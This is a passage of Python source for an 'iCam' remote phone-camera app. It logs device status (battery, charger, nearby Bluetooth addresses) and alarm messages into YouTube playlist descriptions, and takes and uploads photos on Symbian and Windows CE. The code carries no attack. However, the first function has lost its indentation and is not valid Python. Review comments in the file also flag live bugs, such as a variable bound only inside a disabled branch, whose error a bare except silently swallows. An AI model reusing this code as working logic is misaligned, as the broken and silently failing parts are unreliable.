global youtubeClient, youtubeClientAlreadyConnected
global YOUTUBE_TEST_CLIENT_ID, googleUsername, youtubeDeveloperKey
global uploadMediaToYouTube
global deviceId
global btAddrTable
DebugPrint("Entered LogToYouTubePlaylist() at %s." % \
GetCurrentDateTimeStringWithMilliseconds())
"""
if uploadMediaToYouTube == 0:
uploadMediaToYouTube = 1
"""
if youtubeClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
# If connResult == -1 then don't continue
# (most likely bad username/passwd).!!!!
connResult = ConnectToYouTubeGData()
try:
playlistTitle = "iCam_log_" + deviceId #354525040419119
# Create the playlist if it doesn't exist.
if True:
playlistDescription = playlistTitle
playlistToUse = None
"""
!!!!We require the YouTube alias/nickname which can be different
to the Google username!!!!!!!!
"""
#feed = youtubeClient.GetYouTubePlaylistFeed(username =
# "MultiEnder123") #username='ender123')
feed = youtubeClient.GetYouTubePlaylistFeed()
# Returns: A YouTubePlaylistFeed if successfully retrieved.
# print "feed =", feed
# print "feed.entry[0] =", feed.entry[0]
for myEntry in feed.entry:
myEntryTitle = myEntry.title.text
# print "myEntryTitle = %s" % myEntryTitle
#myEntry.id.text =
# http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
# myEntry.id = <xml>...
myEntryIdStr = myEntry.id.text.split("/")[-1]
#print " myEntryIdStr = %s" % myEntryIdStr
if playlistTitle == myEntryTitle:
playlistToUse = myEntry
break
if playlistToUse is None:
# Create the playlist if it was not found
playlistToUse = \
youtubeClient.AddPlaylist(playlistTitle,
playlistTitle, playlist_private=False)
# Returns: The YouTubePlaylistEntry if successfully posted.
"""
Note: YouTube has description playlists of at max 5000 characters.
Picasa has album descriptions of max 1000 characters.
"""
playlistDescription = ""
newPlaylistDescription = \
"batteryLevel = %d; chargerStatus = %d; " % \
(GetBatteryLevelPercentage(), GetChargerStatus())
newPlaylistDescription += \
"btAddrTable = %s\n" % (str(btAddrTable))
DebugPrint("LogToYouTubePlaylist(): newPlaylistDescription = %s." % \
newPlaylistDescription)
"""
newPlaylistDescription += \
"btMsgMostRecentTime = %s, " \
"btAddrTable = %s" % \
(str(btMsgMostRecentTime), str(btAddrTable)))
"""
playlistToUse = None
"""
!!!!We require the YouTube alias/nickname which can be different to
the Google username!!!!
"""
#feed = youtubeClient.GetYouTubePlaylistFeed(username =
# "MultiEnder123") #username='ender123')
feed = youtubeClient.GetYouTubePlaylistFeed()
# Find the YouTube playlist
# Returns: A YouTubePlaylistFeed if successfully retrieved.
# print "DownloadCommandsFromYouTube(): feed = %s" % str(feed)
# print "feed.entry[0] =", feed.entry[0]
for myEntry in feed.entry:
myEntryTitle = myEntry.title.text
# print "myEntryTitle = %s" % myEntryTitle
# myEntry.id.text =
# http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
# myEntry.id = <xml>...
myEntryIdStr = myEntry.id.text.split("/")[-1]
# print " myEntryIdStr = %s" % myEntryIdStr
if myEntryTitle == playlistTitle:
DebugPrint("LogToYouTubePlaylist(): " \
"Feed matched myEntry = %s\n" % str(myEntry) + \
"LogToYouTubePlaylist(): " \
"myEntry.content = %s\n" % str(myEntry.content) + \
"LogToYouTubePlaylist(): " \
"myEntry.description = %s" % str(myEntry.description))
# playlistDescription = myEntry.description.split("/")[-1]
playlistDescription = str(myEntry.description).\
split(">")[-2].split("</")[0]
DebugPrint("LogToYouTubePlaylist(): " \
"playlistDescription = %s" % str(playlistDescription))
playlistToUse = myEntry
break
if playlistToUse is None:
# The YouTube playlist was not found --> we create one
DebugPrint("LogToYouTubePlaylist(): Couldn't find " \
"YouTube playlist %s. Creating it." % playlistTitle)
# Create the playlist if it was not found
playlistToUse = youtubeClient.AddPlaylist(playlistTitle,
newPlaylistDescription, playlist_private=False)
# Returns: The YouTubePlaylistEntry if successfully posted.
myEntryIdStr = playlistToUse.id.text.split("/")[-1]
else:
if len(newPlaylistDescription) + len(playlistDescription) < 5000:
playlistDescription += newPlaylistDescription
else:
playlistDescription = newPlaylistDescription
# if playlistDescription != "":
youtubeClient.UpdatePlaylist(playlist_id=myEntryIdStr,
new_playlist_title=playlistTitle,
new_playlist_description=playlistDescription,
playlist_private=True, username="default")
# return playlistDescription
except:
#newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry,
# pathFileName)
DebugPrintErrorTrace()
DebugPrint("Exiting LogToYouTubePlaylist() at %s." % \
GetCurrentDateTimeStringWithMilliseconds())
def SendAlarmMessageToYouTubePlaylist(message):
    """
    Record an alarm notification in the device's YouTube "alarm" playlist.

    The playlist titled "iCam_alarm_<deviceId>" is looked up in the
    authenticated user's playlist feed.  If it is missing it is created;
    otherwise *message* is appended to the playlist description (or
    replaces it when the combined text would reach YouTube's 5000-char
    description limit).  The playlist description thus serves as the
    alarm log channel.

    message -- free-form alarm text to record in the playlist description.

    Returns None.  All gdata/network errors are swallowed and traced via
    DebugPrintErrorTrace(), mirroring LogToYouTubePlaylist() above.
    """
    global youtubeClient, youtubeClientAlreadyConnected
    global YOUTUBE_TEST_CLIENT_ID, googleUsername, youtubeDeveloperKey
    global uploadMediaToYouTube
    global deviceId
    DebugPrint("Entered SendAlarmMessageToYouTubePlaylist() at %s." % \
        GetCurrentDateTimeStringWithMilliseconds())
    # Force-enable YouTube uploads for the alarm path.
    if uploadMediaToYouTube == 0:
        uploadMediaToYouTube = 1
    if youtubeClientAlreadyConnected == False:
        if gdataModulesImported == False:
            ImportGdataModules()
        # If connResult == -1 then don't continue
        # (most likely bad username/passwd).!!!!
        connResult = ConnectToYouTubeGData()
    try:
        playlistTitle = "iCam_alarm_" + deviceId #354525040419119
        # Create the playlist if it doesn't exist.
        # NOTE(review): this first lookup/create pass is disabled
        # ("if False:"); the live pass further below does the same work.
        if False:
            playlistDescription = playlistTitle
            playlistToUse = None
            """
            !!!!We require the YouTube alias/nickname which can be different
            to the Google username!!!!!!!!
            """
            #feed = youtubeClient.GetYouTubePlaylistFeed(username =
            #    "MultiEnder123") #username='ender123')
            feed = youtubeClient.GetYouTubePlaylistFeed()
            # Returns: A YouTubePlaylistFeed if successfully retrieved.
            # print "feed =", feed
            # print "feed.entry[0] =", feed.entry[0]
            for myEntry in feed.entry:
                myEntryTitle = myEntry.title.text
                # print "myEntryTitle = %s" % myEntryTitle
                #myEntry.id.text =
                #  http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
                #  myEntry.id = <xml>...
                myEntryIdStr = myEntry.id.text.split("/")[-1]
                #print "  myEntryIdStr = %s" % myEntryIdStr
                if playlistTitle == myEntryTitle:
                    playlistToUse = myEntry
                    break
            if playlistToUse is None:
                # Create the playlist if it was not found
                playlistToUse = \
                    youtubeClient.AddPlaylist(playlistTitle,
                        playlistTitle, playlist_private=False)
                # Returns: The YouTubePlaylistEntry if successfully posted.
        """
        Note: YouTube has description playlists of at max 5000 characters.
        Picasa has album descriptions of max 1000 characters.
        """
        playlistDescription = ""
        newPlaylistDescription = \
            "Alarm... motion degree... audio degree... %s." % message
        playlistToUse = None
        """
        !!!!We require the YouTube alias/nickname which can be different to
        the Google username!!!!
        """
        #feed = youtubeClient.GetYouTubePlaylistFeed(username =
        #    "MultiEnder123") #username='ender123')
        feed = youtubeClient.GetYouTubePlaylistFeed()
        # Returns: A YouTubePlaylistFeed if successfully retrieved.
        # print "DownloadCommandsFromYouTube(): feed = %s" % str(feed)
        # print "feed.entry[0] =", feed.entry[0]
        for myEntry in feed.entry:
            myEntryTitle = myEntry.title.text
            # print "myEntryTitle = %s" % myEntryTitle
            # myEntry.id.text =
            #  http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
            #  myEntry.id = <xml>...
            myEntryIdStr = myEntry.id.text.split("/")[-1]
            # print "  myEntryIdStr = %s" % myEntryIdStr
            if myEntryTitle == playlistTitle:
                DebugPrint("SendAlarmMessageToYouTubePlaylist(): " \
                    "Feed matched myEntry = %s\n" % str(myEntry) + \
                    "SendAlarmMessageToYouTubePlaylist(): " \
                    "myEntry.content = %s\n" % str(myEntry.content) + \
                    "SendAlarmMessageToYouTubePlaylist(): " \
                    "myEntry.description = %s" % str(myEntry.description))
                # playlistDescription = myEntry.description.split("/")[-1]
                # Extract the text between the final ">...</" pair of the
                # serialized description element.
                playlistDescription = str(myEntry.description).\
                    split(">")[-2].split("</")[0]
                DebugPrint("SendAlarmMessageToYouTubePlaylist(): " \
                    "playlistDescription = %s" % str(playlistDescription))
                playlistToUse = myEntry
                break
        """
        patternNoCmd = "<ns0:description xmlns:ns0=" \
            "\"http://gdata.youtube.com/schemas/2007\""
        if playlistDescription.find(patternNoCmd) != -1:
            DebugPrint("SendAlarmMessageToYouTubePlaylist(): " \
                "This is not a command, just an empty description.")
            playlistDescription = ""
        else:
            DebugPrint("SendAlarmMessageToYouTubePlaylist(): " \
                "This is a real command.")
        """
        if playlistToUse is None:
            DebugPrint("SendAlarmMessageToYouTubePlaylist(): Couldn't find " \
                "YouTube playlist %s. Creating it." % playlistTitle)
            # Create the playlist if it was not found
            playlistToUse = youtubeClient.AddPlaylist(playlistTitle,
                newPlaylistDescription, playlist_private=False)
            # Returns: The YouTubePlaylistEntry if successfully posted.
            myEntryIdStr = playlistToUse.id.text.split("/")[-1]
        else:
            # Append while under the 5000-char limit; otherwise restart
            # the description with just the new message.
            if len(newPlaylistDescription) + len(playlistDescription) < 5000:
                playlistDescription += newPlaylistDescription
            else:
                playlistDescription = newPlaylistDescription
        # if playlistDescription != "":
        youtubeClient.UpdatePlaylist(playlist_id=myEntryIdStr,
            new_playlist_title=playlistTitle,
            new_playlist_description=playlistDescription,
            playlist_private=True, username="default")
        # return playlistDescription
        if False:
            # It seems this info is not used!
            aVideoTitle = ""
            # It seems this info is not used!
            aVideoDescription = ""
            playlistURI = playlistToUse.feed_link[0].href
            # time.sleep(10) #!!!!!!!!Maybe required
            response = youtubeClient.AddPlaylistVideoEntryToPlaylist(
                playlistURI, "!!!!", #newVideoEntry.id.text.split("/")[-1],
                aVideoTitle, aVideoDescription)
    except:
        #newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry,
        #    pathFileName)
        DebugPrintErrorTrace()
    DebugPrint("Exiting SendAlarmMessageToYouTubePlaylist() at %s." % \
        GetCurrentDateTimeStringWithMilliseconds())
"""
def CreateAlarmPicasaAlbum():
if picasaClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
ConnectToPicasaGData()
try:
albumTitle = deviceId + ": " + time.strftime("%Y-%m-%d", crtTime) + \
(", %d" % cameraId)
iCamAlbumFound = False
# From
# https://code.google.com/apis/picasaweb/docs/1.0/developers_guide_python.html#ListAlbums
# (less important: https://code.google.com/apis/picasaweb/docs/2.0/developers_guide_protocol.html#ListAlbums)
# albumsFeed = picasaClient.GetUserFeed(kind = "album", user = "ender123")
albumsFeed = picasaClient.GetUserFeed(kind = "album")
# # IMPORTANT NOTE: it does not print the album list - I believe
# # BECAUSE THE tostring() METHOD DOESN'T DUMP THE ALBUMS LIST :))
#DebugPrint("albumsFeed = %s" % str(albumsFeed))
for album in albumsFeed.entry:
DebugPrint("Title: %s, number of photos: %s, id: %s" % \
(album.title.text, album.numphotos.text,
album.gphoto_id.text))
#picasaClient.Delete(album)
if album.title.text == albumTitle:
iCamAlbumFound = True
break
if iCamAlbumFound == True:
#print "Found"
iCamAlbum = album
else:
#print "Not found"
#!!!!IMPORTANT: Unfortunately this private argument gets translated
# in Picasa in the attribute Visibility - "Anyone with the link".
# Currently to fix this, the user has to go on Picasa and edit the
# attribute manually.
            # Find a programmatic solution...!!!!
iCamAlbum = picasaClient.InsertAlbum(title = albumTitle,
summary = "iCam photo album.",
location = "Bucharest",
access = "private")
except:
DebugPrintErrorTrace()
"""
def GetLatestPhoto(anExtension=".jpg"):
    """
    Return the newest not-yet-reported photo from the current hour's media
    folder, as a (fileName, pathFileName) tuple, or None.

    anExtension -- substring (normally a file extension) a file name must
        contain, case-insensitively, to be considered.

    Requires at least two candidate files (see the "< 2" guard below).
    The module-level lastResultGetLatestPhoto is used to avoid reporting
    the same photo twice.  Any error (e.g. the hourly folder does not
    exist yet) is traced and yields an implicit None return.
    """
    global lastResultGetLatestPhoto
    try:
        # For Android, GetCurrentDateTime() .
        crtTime = time.localtime()
        # One media subfolder per hour: YYYY_MM_DD_HH.
        crtLOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_MEDIA_FILES + "/" + \
            "%04d_%02d_%02d_%02d" % (crtTime.tm_year, crtTime.tm_mon,
            crtTime.tm_mday, crtTime.tm_hour)
        """
        DebugPrint("crtLOCAL_FOLDER_MEDIA_FILES = %s" % \
            crtLOCAL_FOLDER_MEDIA_FILES)
        """
        #crtTime2 = GetTime()
        # See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
        #numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
        #crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday, crtTime.tm_hour,
        #    crtTime.tm_min, crtTime.tm_sec, numMilliseconds
        folderContent = os.listdir(crtLOCAL_FOLDER_MEDIA_FILES)
        """
        Put in sortedFolderContent only the filenames for the folderContent
        that don't have the extension anExtension.
        """
        # NOTE(review): despite the docstring above, the condition below
        # KEEPS the names that DO contain anExtension (find() != -1).
        sortedFolderContent = []
        for elem in folderContent:
            if str.lower(elem).find(anExtension) != -1:
                # print "%s doesn't contain anExtension" % elem
                # folderContent = folderContent.remove(elem)
                # folderContent.remove(elem)
                sortedFolderContent.append(elem)
        """
        Use reverse = False to send first the oldest ones (like this you send
        in chronological order). Use reverse = True for sending first the
        most recent ones.
        """
        # sortedFolderContent = sorted(folderContent, reverse = False)
        """
        sort() without parameters is the ONLY one that works in
        Python 2.2.
        (Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
        """
        sortedFolderContent.sort()
        # sortedFolderContent = folderContent
        # """
        """
        DebugPrint("VideoRecordAndUpload(): sortedFolderContent = %s." % \
            sortedFolderContent)
        """
        DebugPrint("GetLatestPhoto(): sortedFolderContent = %s\n" % \
            str(sortedFolderContent) + \
            "GetLatestPhoto(): " \
            "sortedFolderContent[len(sortedFolderContent) - 1] = %s" % \
            sortedFolderContent[len(sortedFolderContent) - 1])
        # """
        #if len(sortedFolderContent) < 1:
        if len(sortedFolderContent) < 2:
            #if sortedFolderContent != []:
            return None
        if False:
            #actualFileName = sortedFolderContent[len(sortedFolderContent) - 1]
            actualFileName = sortedFolderContent[len(sortedFolderContent) - 1]
        # NOTE(review): actualFileName is only bound inside the disabled
        # "if False:" branch above, so the next line raises NameError, which
        # the bare except below swallows -- i.e. the alarm tail of this
        # function appears to be effectively disabled.  Confirm the intended
        # nesting against the original file's indentation before re-enabling.
        photoPathFileName = crtLOCAL_FOLDER_MEDIA_FILES + "/" + actualFileName
        resultGetLatestPhoto = (actualFileName, photoPathFileName)
        # De-duplicate: only report a photo the first time it is seen.
        if lastResultGetLatestPhoto == resultGetLatestPhoto:
            return None
        else:
            lastResultGetLatestPhoto = resultGetLatestPhoto
        """
        # We have a new photo - so we call the alarm phone.
        #From https://code.google.com/p/android-scripting/wiki/ApiReference#phoneCall
        phoneCall(String uri)
        #From https://code.google.com/p/android-scripting/wiki/ApiReference#smsSend
        smsSend(String destinationAddress:
            typically a phone number, String text)
            Sends an SMS.
        if ANDROID_OS:
            myDroid.phoneCall("tel:" + ALARM_PHONE_NUMBER)
            #myDroid.smsSend("tel:+01234567890", "Max 160 chars I guess")
        """
        SendAlarmMessageToYouTubePlaylist(actualFileName)
        if False:
            if GetCurrentDateTimeStringWithMilliseconds().startswith(
                "2012_09_02_17"):
                myDroid.smsSend(ALARM_SMS_PHONE_NUMBER,
                    "Houston, we've got ack.")
        return resultGetLatestPhoto
    except:
        DebugPrintErrorTrace()
def TakePhotoAndUpload_S60(cameraId, photoFileName, \
        photoPathFileName):
    """
    Symbian S60: take a photo with the PyS60 camera module, save it
    locally, optionally down-scale it, and upload it to the iCam server.

    cameraId -- index of the camera to use (0 appears to be the main,
        landscape-oriented camera).
    photoFileName -- bare file name the photo is uploaded under.
    photoPathFileName -- full local path the photo is saved to.

    Returns None.  Capture, save and resize failures are reported (via
    DebugPrint/UploadGZippedData) and abort the function early.
    """
    global accessPointName
    global LOCAL_FOLDER_MEDIA_FILES, bluetoothMode
    global flashStr, exposureStr, whiteBalanceStr
    global orientationForThisPhoneModel
    global digitalZoom, flashIndex, exposureIndex, whiteBalanceIndex
    if (cameraId == 0) and (orientationForThisPhoneModel == "landscape"):
        # (phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82"])):
        """
        We give reset_inactivity() in order to turn the display on in
        order for the cellphone to capture at maximum (angular) view,
        at the maximum resolution.
        """
        e32.reset_inactivity()
        SetUIOrientation(cameraId, True)
        e32.ao_sleep(1)
    """
    Unfortunately it doesn't help: even if the viewfinder controls well
    the exposure, etc, the photo taken is still with its own
    settings, independent of the viewfinder.
    On models with shutter like N95, N82, etc, it is better to start
    the VF, in order to avoid taking photos over-exposed, etc - it
    seems the viewfinder allows to control automatically the photo
    params.
    """
    if startViewfinderBeforeTakingPhoto:
        # and (phoneModel in ["NokiaN95", "NokiaN82"])):
        # if startViewfinderBeforeTakingPhoto or (not startAutomatically):
        StartViewFinderForCamera(cameraId, True, True)
        # With the backlight on (param True).
        e32.ao_sleep(3)
        # e32.ao_yield()
        e32.reset_inactivity()
    """
    UploadText("Taking photo: cameraId = %d, resolution = %d x %d, " \
        "zoom = %d. JPEG quality = %d." \
        % (cameraId, photoResolutionStr[photoResolutionIndex][1][0],
        photoResolutionStr[photoResolutionIndex][1][1],
        digitalZoom, photoQuality), ICAM_SERVER_NAME,
        WEBPAGE_UL_GZIPPED_TEXT)
    """
    """
    From S60 Module Reference, Release 2.0.0 final:
    take_photo([mode,
        size,
        zoom,
        flash,
        exposure,
        white balance,
        position])
    """
    try:
        """
        camera.take_photo('RGB',
            photoResolutionStr[photoResolutionIndex][1], digitalZoom,
            'none', 'auto', 'auto', cameraId)
        pic = camera.take_photo('RGB', localPhotoResolution[cameraId],
            digitalZoom, 'none', 'auto', 'auto', cameraId)
        """
        # Take the picture with cameraId.
        pic = camera.take_photo(
            photoModeStr[photoModeIndex[cameraId]][1],
            localPhotoResolution[cameraId],
            digitalZoom,
            flashStr[flashIndex][1],
            exposureStr[exposureIndex[cameraId]][1],
            whiteBalanceStr[whiteBalanceIndex[cameraId]][1],
            cameraId
            )
        if phoneModel in ["NokiaN95", "NokiaN82"]:
            """
            # In order to close the shutter immediately after taking
            #    the photo.
            camera.release()
            #camera._my_camera = camera._camera.Camera(cameraId)
            camera.UseCamera(cameraId)
            """
            GeneralUseCameraS60(cameraId)
    except:
        # Capture failed: report with as much context as possible and abort.
        pic = None
        (exceptionType, exceptionValue, exceptionTraceback) = \
            sys.exc_info()
        # traceback.print_exc()
        errorStr = "TakePhotoAndUpload_S60(%d): camera.take_photo for " \
            "photoFileName = %s, localPhotoResolution = %s, " \
            "free_ram = %d returned exception %s. Bailing out..." % \
            (cameraId, photoFileName,
            localPhotoResolution[cameraId], GetFreeRAM(),
            repr(traceback.format_tb(exceptionTraceback)))
        """
        UploadGZippedData(deviceId,
            "Exception in TakePhotoAndUpload(%d)" \
            " with photoFileName = %s: camera.take_photo" \
            " - details: localPhotoResolution = %s, " \
            "free_ram = %d. %s. Bailing out...\n" \
            % (cameraId, photoFileName,
            localPhotoResolution[cameraId],
            GetFreeRAM(),
            repr(traceback.format_tb(exceptionTraceback))),
            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
        """
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_TEXT, None)
        DebugPrint(errorStr)
        DebugPrintErrorTrace()
        if MY_DEBUG_STDERR_2:
            sys.stderr.write("    " + errorStr + "\n")
            sys.stderr.flush()
        return
    """
    save(filename[, callback=None, format=None, quality=75, bpp=24,
        compression='default' ])
    """
    try:
        # Save the photo (as JPEG) with photoQuality
        #pic.save(photoPathFileName, quality = photoQuality)
        if photoModeStr[photoModeIndex[cameraId]][1] == "JPEG_Exif":
            """
            In "JPEG_Exif" mode take_photo returns the JPEG file to be
            saved, and not a photo, so it needs to be saved directly
            to the disk and then reloaded in a graphics.Image object.
            """
            fOutput = open(photoPathFileName, "wb")
            fOutput.write(pic)
            # fOutput.flush()
            fOutput.close()
            # return
            DebugPrint("Saved JPEG data object received directly from " \
                "the hardware, without calling pic.save().")
            if not MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD:
                """
                Requires backslashes, otherwise graphics.Image.open
                gives exception: SymbianError: [Errno -28] KErrBadName
                """
                photoPathFileNameWithBackslashes = \
                    photoPathFileName.replace("/", "\\")
                """
                We assign None to reassign it, IF necessary, the
                Image.open(photoPathFileNameWithBackslashes).
                """
                pic = None
        else:
            # Assuming RGB (RGB24)
            """
            save(filename[, callback=None, format=None, quality=75, bpp=24,
                compression='default' ])
            """
            """
            if storeLocallyMedia == 1:
                # Save the photo (as JPEG) with max quality (100%) locally.
                pic.save(photoPathFileName, None, None, 100)
                # Requires backslashes, otherwise pic.save gives exception:
                #    SymbianError: [Errno -28] KErrBadName
            """
            photoPathFileNameWithBackslashes = \
                photoPathFileName.replace("/", "\\")
            # Save the photo (as JPEG) with maximum quality (100%) locally.
            pic.save(photoPathFileNameWithBackslashes, None, None, 100)
        """
        if (accessPointName == u"") and (bluetoothMode != 2):
            DebugPrint("TakePhotoAndUpload(): Not uploading photo.")
            #In order to save the state on the memory card, we call
            #    UploadStateAndFileAndStoreState:
            #UploadStateAndFileAndStoreState(None, cameraId,
            #    crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday,
            #    crtTime.tm_hour, crtTime.tm_min, crtTime.tm_sec,
            #    None, ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
            return
        """
    except IOError:
        # NOTE(review): unlike the generic except below, this IOError path
        # does not return -- execution falls through to the resize/upload
        # stage even though the save failed.  Confirm this is intended.
        DebugPrint("TakePhotoAndUpload_S60(%d): pic.save returned IOError " \
            "exception when saving %s." % \
            (cameraId, photoFileName))
        DebugPrintErrorTrace()
    except:
        # traceback.print_exc()
        (exceptionType, exceptionValue, exceptionTraceback) = \
            sys.exc_info()
        errorStr = "TakePhotoAndUpload_S60(%d): while saving " \
            "photoPathFileName = %s; free_ram = %d, returned " \
            "exception %s. Bailing out..." % \
            (cameraId, photoPathFileName, GetFreeRAM(),
            repr(traceback.format_tb(exceptionTraceback)))
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_TEXT, None)
        DebugPrint(errorStr)
        if MY_DEBUG_STDERR:
            traceback.print_exc()
            sys.stderr.write("    " + errorStr + "\n")
            sys.stderr.flush()
        return
    if (photoResolutionStr[photoResolutionIndex][1][0] == 0) and \
            (photoResolutionStr[photoResolutionIndex][1][1] == 0):
        """
        A resolution of (0, 0) means we do not upload the photo
        to the server.
        """
        pass
    else:
        """
        We check if we specified that the uploaded photo has the same
        res as the local one
        (photoResolutionStr[photoResolutionIndex][1] = (-1, -1)
        or that the width of the photo saved locally is smaller than
        the width of the photo we want to send over the Internet, in
        which case we send the local photo non-resized.
        """
        if (photoResolutionStr[photoResolutionIndex][1][0] == -1) and \
                (photoResolutionStr[photoResolutionIndex][1][1] == -1) or \
                (localPhotoResolution[cameraId][0] <= \
                photoResolutionStr[photoResolutionIndex][1][0]):
            """
            We check after the width of the photo.
            !!!!we do not check also after the height, i.e.,
            localPhotoResolution[cameraId][1].
            """
            photoResizedPathFileName = photoPathFileName
            picResized = pic #!!!!TODO: probably not necessary --> remove
            DebugPrint("TakePhotoAndUpload_S60: Not resizing photo since the "\
                "desired resolution of the sent photo is " \
                "greater or equal to the local resolution.")
        else:
            # Reload from disk if pic was released in the JPEG_Exif path.
            if pic == None:
                pic = graphics.Image.open(
                    photoPathFileNameWithBackslashes)
            """
            Since photoResizedPathFileName is "temp.jpg" we do
            not unlink it.
            """
            photoResizedPathFileName = LOCAL_FOLDER_MEDIA_FILES + \
                "/temp.jpg"
            DebugPrint("TakePhotoAndUpload_S60(%d) with photoFileName = %s: " \
                "pic.resize to (%d, %d)." % \
                (cameraId, photoFileName,
                photoResolutionStr[photoResolutionIndex][1][0],
                photoResolutionStr[photoResolutionIndex][1][1]))
            try:
                """
                From PyS60 2.0 documentation:
                resize(newsize[, callback=None, keepaspect=0 ]);
                size is a two-element tuple .
                """
                picResized = \
                    pic.resize(photoResolutionStr[photoResolutionIndex][1])
            except:
                """
                We do this in order to force the garbage collection - but,
                it doesn't really work it seems...
                """
                pic = None
                picResized = None
                # del pic
                # import gc
                # gc.collect() #does not work in PyS60 1.4.5
                (exceptionType, exceptionValue, exceptionTraceback) = \
                    sys.exc_info()
                errorStr = "TakePhotoAndUpload_S60(%d): pic.resize with " \
                    "photoFileName = %s (free_ram = %d) " \
                    "returned exception: " \
                    "exceptionTraceback = %s, " \
                    "exceptionType = %s, exceptionValue = %s. " \
                    "Bailing out..." % \
                    (cameraId, photoFileName, GetFreeRAM(),
                    repr(traceback.format_tb(exceptionTraceback)),
                    str(exceptionType),
                    str(exceptionValue))
                if MY_DEBUG_UPLOAD_MSG:
                    """
                    UploadGZippedData(deviceId,
                        "Exception in TakePhotoAndUpload(%d) with " \
                        "photoFileName = %s: pic.resize - details: " \
                        "free_ram = %d. %s.\n" % \
                        (cameraId, photoFileName, GetFreeRAM(),
                        repr(traceback.format_tb(exceptionTraceback)) ),
                        ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
                    """
                    UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
                        WEBPAGE_UL_GZIPPED_TEXT, None)
                DebugPrint(errorStr)
                if MY_DEBUG_STDERR:
                    sys.stderr.write("    " + errorStr + "\n")
                DebugPrintErrorTrace()
                return
            """
            From PyS60 2.0 documentation:
            transpose(direction[, callback=None ])
            """
            try:
                # save(filename [,
                #    callback=None,
                #    format=None,
                #    quality=75,
                #    bpp=24, compression="default"])
                """
                Requires backslashes, otherwise pic.save gives exception:
                SymbianError: [Errno -28] KErrBadName
                """
                photoResizedPathFileNameWithBackslashes = \
                    photoResizedPathFileName.replace("/", "\\")
                # Save the photo (as JPEG) with photoQuality.
                picResized.save(photoResizedPathFileNameWithBackslashes,
                    None, None, photoQuality)
            except IOError:
                DebugPrint("TakePhotoAndUpload_S60(%d): picResized.save " \
                    "returned exception IOError when saving %s. " \
                    "Bailing out..." % (cameraId, photoFileName))
                return
            except:
                (exceptionType, exceptionValue, exceptionTraceback) = \
                    sys.exc_info()
                # traceback.print_exc()
                errorStr = "TakePhotoAndUpload_S60(%d): picResized.save " \
                    "when saving photoFileName = %s " \
                    "(free_ram = %d) returned exception %s. " \
                    "Bailing out..." % \
                    (cameraId, photoFileName, GetFreeRAM(),
                    repr(traceback.format_tb(exceptionTraceback)))
                if MY_DEBUG_UPLOAD_MSG:
                    UploadGZippedData(deviceId, errorStr,
                        ICAM_SERVER_NAME,
                        WEBPAGE_UL_GZIPPED_TEXT, None)
                DebugPrint(errorStr)
                if MY_DEBUG_STDERR:
                    sys.stderr.write("    " + errorStr + "\n")
                DebugPrintErrorTrace()
                return
        if uploadMediaToIQEngines:
            if (photoResolutionStr[photoResolutionIndex][1][0] == -1) and \
                    (photoResolutionStr[photoResolutionIndex][1][1] == -1) and \
                    (localPhotoResolution[cameraId][0] <= 640):
                """
                We can upload to IQEngines only photos of maximum
                (640, 480) resolution.
                """
                IQEnginesPhotoUpload(photoResizedPathFileName)
        try:
            res = UploadStateAndFileAndStoreState(deviceId, cameraId,
                photoFileName, photoResizedPathFileName,
                ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
                singleThreaded=False
                )
        except:
            DebugPrintErrorTrace()
def TakePhotoAndUpload_WinCE(cameraId, photoFileName, \
        photoPathFileName):
    """
    Windows CE: capture one photo by spawning the external capture tool,
    then upload the bitmap it produces.

    cameraId -- camera index, forwarded to the upload call.
    photoFileName, photoPathFileName -- proposed names; their 4-character
        extension is rewritten to ".bmp" because the capture tool only
        emits bitmaps.

    Returns the (possibly rewritten) (photoFileName, photoPathFileName)
    pair.  Any failure is traced via DebugPrintErrorTrace() and swallowed.
    """
    try:
        # The external tool always writes its output here, as a bitmap.
        OUTPUT_PHOTO_PATH_FILENAME = LOCAL_FOLDER + "/photo.bmp"
        # Rewrite the 4-character extension of both proposed names so they
        # agree with the format the capture tool actually produces.
        outExtension = \
            OUTPUT_PHOTO_PATH_FILENAME[len(OUTPUT_PHOTO_PATH_FILENAME) - 4:]
        photoFileName = photoFileName[:len(photoFileName) - 4] + outExtension
        photoPathFileName = \
            photoPathFileName[:len(photoPathFileName) - 4] + outExtension
        # Windows APIs expect backslash-separated paths.
        OUTPUT_PHOTO_PATH_FILENAMEWithBackslashes = \
            OUTPUT_PHOTO_PATH_FILENAME.replace("/", "\\")
        photoPathFileNameWithBackslashes = \
            photoPathFileName.replace("/", "\\")
        # Drop any stale output left over from a previous capture.
        if os.path.isfile(OUTPUT_PHOTO_PATH_FILENAME):
            os.unlink(OUTPUT_PHOTO_PATH_FILENAME)
        tmpPathFileName = LOCAL_FOLDER + "/take_photo_320_240_bmp_and_exit.exe"
        WinSpawn(tmpPathFileName.replace("/", "\\"), [])
        # Give the spawned tool time to finish writing the file to disk
        # (may not always be enough -- see the next capture's unlink above).
        time.sleep(5.0)
